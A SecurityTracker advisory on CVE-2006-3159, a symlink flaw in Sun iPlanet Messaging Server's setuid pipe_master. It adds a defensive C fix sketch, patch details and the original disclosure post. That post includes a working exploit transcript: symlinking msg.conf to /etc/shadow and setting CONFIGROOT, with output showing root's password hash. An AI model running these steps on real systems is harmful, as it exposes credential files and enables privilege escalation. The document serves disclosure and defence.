SecurityTracker.com
Category:   Application (E-mail Server)  >   Sun ONE/iPlanet Messaging Server
Vendors:   Sun
Sun ONE/iPlanet Messaging Server 'msg.conf' Symlink Flaw Lets Local Users View Files
SecurityTracker Alert ID:  1016312
SecurityTracker URL:  http://securitytracker.com/id/1016312
CVE Reference:   CVE-2006-3159
Updated:  Sep 13 2006
Original Entry Date:  Jun 15 2006
Impact:   Disclosure of system information, Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): Sun Java System Messaging Server 6.0, 6.1, and 6.2, iPlanet Messaging Server 5.2
Description:   A vulnerability was reported in Sun ONE/iPlanet Messaging Server. A local user can view portions of files on the target system.

A local user can set the CONFIGROOT environment variable to make the setuid server programs read their configuration from the 'msg.conf' file in a directory of the user's choosing. By placing a symbolic link (symlink) named 'msg.conf' in that directory that points to an arbitrary file, and then invoking '/iplanet/iMS5/bin/msg/imta/bin/pipe_master', the local user can view the first line of the linked file, which is read with root privileges.
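
The following is an added example, not code from Sun, SecurityTracker or the original report: a C sketch of how a setuid program can avoid this class of flaw by ignoring CONFIGROOT across the privilege boundary and refusing a 'msg.conf' that is a symlink. It goes slightly beyond the reported case by also refusing hard-linked, foreign-owned or group/world-writable files. The function names (config_root, open_trusted_conf, demo) and the temporary directory are assumptions made for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Primary control: honor CONFIGROOT only when not running set-id. */
const char *config_root(const char *builtin_default) {
    const char *env = getenv("CONFIGROOT");
    int setid = getuid() != geteuid() || getgid() != getegid();
    return (env != NULL && !setid) ? env : builtin_default;
}

/* Defense in depth: open <dir>/msg.conf only if it is a regular, single-link file
 * owned by `owner` (0 in a setuid-root program), not group/world writable. */
int open_trusted_conf(const char *dir, uid_t owner) {
    char path[4096];
    struct stat st;
    if (snprintf(path, sizeof path, "%s/msg.conf", dir) >= (int)sizeof path)
        return -1;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0)
        return -1; /* includes ELOOP: msg.conf itself is a symlink */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1 ||
        st.st_uid != owner || (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed fixture in a private temp dir: 1 = symlink refused, file accepted. */
int demo(void) {
    char dir[] = "/tmp/msgconf.XXXXXX", conf[64], other[64];
    if (!mkdtemp(dir)) return -1;
    snprintf(conf, sizeof conf, "%s/msg.conf", dir);
    snprintf(other, sizeof other, "%s/other", dir);
    int fd = open(other, O_CREAT | O_WRONLY, 0600);
    if (fd < 0 || close(fd) || symlink(other, conf)) return -1;
    int refused = open_trusted_conf(dir, geteuid()) < 0;
    if (unlink(conf) || rename(other, conf)) return -1;
    fd = open_trusted_conf(dir, geteuid());
    if (fd >= 0) close(fd);
    unlink(conf);
    rmdir(dir);
    return refused && fd >= 0;
}

int main(void) { puts(demo() == 1 ? "symlink refused" : "unexpected"); return 0; }
```

O_NOFOLLOW covers only the final path component, so the checks on the opened descriptor complement, and do not replace, ignoring the environment variable in a set-id process.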

php0t / zorro.hu reported this vulnerability.

Impact:   A local user can view portions of arbitrary files on the target system.
Solution:   Sun has issued the following fix.

SPARC Platform

* iPlanet Messaging Server 5.2 (for Solaris 8 and 9) with patch 5.2hf2.14 or later

The following T-Patches are also available:

SPARC Platform

* Sun Java System Messaging Server 6.0, 6.1, and 6.2 T-Patch T118207-57 (for Solaris 8, 9, and 10)

x86 Platform

* Sun Java System Messaging Server 6.0, 6.1, and 6.2 T-Patch T118208-57 (for Solaris 8, 9, and 10)

Linux Platform

* Sun Java Messaging Server 6.0, 6.1, and 6.2 T-Patch T118209-57 (for RHEL 2.1 and 3.0)

The Sun advisory is available at:

http://sunsolve.sun.com/search/document.do?assetkey=1-26-102496-1

Vendor URL:  sunsolve.sun.com/search/document.do?assetkey=1-26-102496-1
Cause:   Access control error, State error
Underlying OS:  Linux (Any), UNIX (Solaris - SunOS)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] Sun iPlanet Messaging Server 5.2 root password

Summary
----------------
Date: 14 Jun 2006
Vendor: Sun Microsystems, Inc.
Name: iPlanet Messaging Server
Version: 5.2 HotFix 1.16 (built May 14 2003)
Vuln: msg.conf symlink attack
Severity: high


Software description
----------------
The iPlanet Messaging Server is a software product that provides a
centralized location for the exchange of information through the sending
and receiving of messages. The product is designed for
telecommunications providers, service providers, and enterprises that
offer messaging capabilities to employees, partners, and customers. The
iPlanet Messaging Server delivers a Web-based messaging platform capable
of serving tens of millions of users, and also provides value-added
differentiated services, including outsourcing, wireless, and unified
messaging services.

  
Vulnerability description
----------------
Setuid programs that are part of the iPlanet Messaging Server try to read the
configuration file msg.conf.
If the environment variable CONFIGROOT is set, the configuration is read
from that directory.
A symlink attack is possible, and as a result it is possible to read the
first line of any file with uid=0.


Example
----------------
test@sunbox:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/version
iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)
libimta.so 5.2 HotFix 1.16 (built 12:32:17, May 14 2003)
SunOS sunbox 5.9 Generic_118558-22 sun4u sparc SUNW,Sun-Fire-280R
Solaris
test@sunbox:/tmp$ 
test@sunbox:/tmp$ ls -la /iplanet/iMS5/bin/msg/imta/bin/pipe_master
-rws--s--x    1 root     mail       446864 Sep 22  2005
/iplanet/iMS5/bin/msg/imta/bin/pipe_master
test@sunbox:/tmp$ 
test@sunbox:/tmp$ ln -s /etc/shadow msg.conf
test@sunbox:/tmp$ 
test@sunbox:/tmp$ export CONFIGROOT=.
test@sunbox:/tmp$ 
test@sunbox:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/pipe_master
[14/Jun/2006:11:13:49 +0200] sunbox [119]: General Error:
func=_configdrv_file_readoption; error=option name should be followed by
'='; line=root:qW1HFEa1MCD0w:11821::::::
ERROR: Configuration database initialization failed - see default
logfile
test@sunbox:/tmp$ 


Vulnerable
----------------
iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)

php0t / zorro.hu
www.zorro.hu

